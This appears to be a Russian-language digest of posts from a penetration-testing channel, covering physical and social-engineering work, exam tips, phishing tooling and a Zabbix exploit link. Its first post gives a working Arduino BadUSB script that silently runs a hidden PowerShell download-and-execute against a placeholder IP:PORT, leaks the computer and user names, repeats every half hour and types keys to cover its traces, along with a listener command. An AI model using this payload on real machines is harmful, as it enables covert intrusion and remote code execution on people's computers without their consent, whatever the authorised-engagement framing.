BadUSB Check-Script 😈

Если во время выполнения работы по социальной инженерии — будь то через флешки или физику, — нам не требуется делать пробив, мы можем просто отправить запрос на подконтрольный сервер и залогировать входящие запросы.

Поскольку заказчику необходимо знать, кому проводить обучение после завершения кампании 😐, нам нужно собрать минимальную информацию о хосте, с которого был отправлен запрос. В скрипте ниже, используя переменные окружения, мы отправляем с виндовой тачки запрос, содержащий hostname и username.

Помимо сбора информации, такой подход помогает не потерять запросы, которые мы можем пропустить из-за надоедливых сканов со стороны Shodan, Censys и пр.

Скрипт, который я написал и активно использую, работает с модулем Paensy, разбор которого был ранее на канале:

#include <paensy.h>

void setup() {
  delay(5000);
  SetDelay(100);
  while (true) {
    delay(5000);
    RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
    PressKey(KEY_ENTER, 1);
    PressKey(KEY_ESC, 1);
    Keyboard.press(KEY_LEFT_SHIFT);
    Keyboard.press(KEY_LEFT_ALT);
    Keyboard.releaseAll();           
    delay(500);
    RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
    PressKey(KEY_ENTER, 1);
    PressKey(KEY_ESC, 1);
    Keyboard.press(KEY_LEFT_GUI);
    Keyboard.press(KEY_SPACE);
    Keyboard.releaseAll();           
    delay(500);
    RunCommand("powershell -windowstyle hidden IEX (New-Object System.Net.WebClient).DownloadString('http://IP:PORT/%computername%/%username%')");
    PressKey(KEY_ENTER, 1);
    PressKey(KEY_ESC, 1);
    PressKey(KEY_BACKSPACE, 1);
    delay(1800000);
  }
}

void loop() {
}

А для того, чтобы отлавливать запросы, мы можем использовать простой Python HTTP Server:

sudo PYTHONUNBUFFERED=x python3 -m http.server PORT &> ../http.server.log & echo $! > ../http.server.pid

Здесь мы:
1. Отключаем буферизацию вывода;
2. Перенаправляем как stderr, так и stdout в лог-файл;
3. Записываем pid в файл, чтоб не потерять его и спокойно убить процесс, в случае необходимости.

По основному скрипту:
1. Основной скрипт для Arduino меняет язык раскладки, используя всего два сочетания клавиш, что можно изменить по вашему усмотрению;

2. Если цель еще не на рабочем месте, можно вставить плату и забыть о ней— скрипт выполняется каждые полчаса в бесконечном цикле;

3. Нажатие же клавиш типа ESC,ENTER и BACKSPACE нужно для того, чтобы, если компьютер заблокирован, у таргета стирались те данные, которые были введены в процессе выполнения скрипта.
не палимся)

TRY FCK HARDER 🕺

ПРОНИКАЕМ НА ЗАЩИЩАЕМЫЙ ОБЪЕКТ

Всем Q, недавно совместно с @pro_pentest замутили небольшое интервью по прошедшему сольному проекту по физике:

Ссылка!

В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.

Интересных проектов много, так что рассказать точно будет о чем 😈

TRY FCK HARDER 🎉

Стань инсайдером на OFFZONE 2024 💪

Всем привет, приближается оффзон, а это значит, что самое время начинать к нему готовиться!

Вместе с парнями с каналов @pro_pentest и @api_0 мы предлагаем Вам почувствовать себя в шкуре инсайдера, а так же побороться за крутые призы!

С деталями челленджа знакомьтесь в видосе:
https://youtu.be/WE-GAswXMUA

Увидимся на оффзоне!
TRY FCK HARDER 💪

Все еще достоин.. 😮

Всем ку, давно не слышались!
В последнее время у меня были (и в ближайшее время будут 🤩) очень загруженные дни, которые не оставляли шанса запостить что-нибудь годное в канал. Основная проблема, в общем-то, и заключается в том, что сделать хочется качественно, но 24 часа в сутках, увы, не позволяют разорваться и преуспеть везде.

Это ни в коем случае не пост-оправдание, почему одмен проебывается и дропает так мало постов, скорее я просто хочу немного похвастаться и поделиться с вами своими успехами)

И такс, поехали, чем же занимался одмен все это время:

1. Вернулся к преподаванию
Удалось даже остаться в той стезе, в которой у меня уже был опыт - Python в Пентесте 🤓
*Уже даже есть фидбэк<3, спасибо любимым студентам, некоторые из которых подписаны и сейчас это читают*

2. Сдал BSCP 😮
Пасиба гайдам от товарища по цеху и хорошего друга Никиты - @wr3dmast3rvs. Абсолютно точно не я первый это скажу, но, по моим наблюдениям, гига важно на каждый потенциально уязвимый эндпоинт использовать Active Scan, а так же не забывать сразу ставить логинку на брут(вордлисты брал тут).
Уже после экзамена несколько раз ловил себя на мысли о том, как можно было бы без скана найти те или иные векторы, а в частности контексты внедрения.. Скорее всего, учитывая ограничения по времени, это близко, если и не к невозможному, то абсолютно точно к полной жопе, которую можно избежать, просто направляя запросы в Active Scan!

3. Сходил на Pentest Award 😎
Подавал свой кейс с использованием технологий DeepFaceLive во время социалки, который позволил мне попасть в шорт-листы и оставаться конкурентным участником в своей номинации(Ловись рыбка).
Не буду рассказывать про свой фидбэк, потому что не я сижу в жюри, но с некоторыми призовыми кейсами я был немного несогласен, думаю, кто смотрел, тот поймет.
В любом случае, спасибо ребятам за то, что позвали, а я в свою очередь пойду набирать багаж опыта, чтобы было чем поделиться на премии в следующем году)

А на этом пока все, годнота близко, и думаю, что скоро смогу запостить кое-что интересное по хардваре! still fck harder!

TRY FCK HARDER 🥳

Двигаем от второго выхода автозаводской 👊 Карточки все еще есть..

Разведка/кибер-диверсии/16 часов в розыске/угон авто на проектах по физическому пентесту

Под прошлым роликом по физическому проникновению было много комментариев о том, что хотелось бы более основательно углубиться в эту тему.
Комменты читаем, прислушиваемся, решили нашей скромной командой записать подкаст, в котором поговорили буквально обо всем)
пысы. Название говорит само за себя..🤡

https://www.youtube.com/watch?v=s9B9zxnMSzA

Смотрим, подписываемся, лайкаем и оставляем комментарии!

TRY FCK HARDER 🤩

gophishGroupsAdder 😩

Всем ку! Давно не виделись!
Думаю, очевидно, что 4 квартал никого не щадит)

Исходя из задачек и того материала, над которым в данный момент работаю, решил написать следующий простенький скриптец:

https://github.com/E1tex/gophishGroupsAdder

Мало кто любит бдсм вишинг, но нужен этот скрипт по большому счету только для этого.

В случаях, когда заказчик пуляет в вас миллион клиентов, которых надо будет отзвонить, а соответственно и таргетированно отослать письма, ручками заносить всех пользаков в разные группы было бы слишком долго. Тут вам и поможет gophishGroupsAdder, работающий на основе Gophish API. Enjoy!

TRY FCK HARDER ☺️

Сети и системы передачи информации

Пожалуй, это один из лучших курсов, которые я когда-либо видел по практическим сетям. Сколько бы раз я ни рассказывал про него, всегда все просили поделиться ссылкой. И вот оно случилось: @sadykovildar дал добро (за что ему большое спасибо), а значит, ловите🎸

https://sadykov.notion.site/1-bb9630269fa14ce4b21f5b10339af168

Т.к. репа в ноушене, для просмотра лекционного материала, используйте VPN.

TRY FCK HARDER 👀

CVE-2024-42327 😌

Немного опоздал, но, учитывая то, как забикс заполонил корпоративные сети и оценку уязвимости в 9.9 баллов по шкале CVSS, пок не утратил свою актуальность:

https://github.com/depers-rus/CVE-2024-42327

Для эксплуатации нужна валидная учетка с любой ролью, учетки которой могут взаимодействовать с апишкой.
Пок написан под постгрю, для других субд адаптируйте синтаксис запроса.

TRY FCK HARDER 😇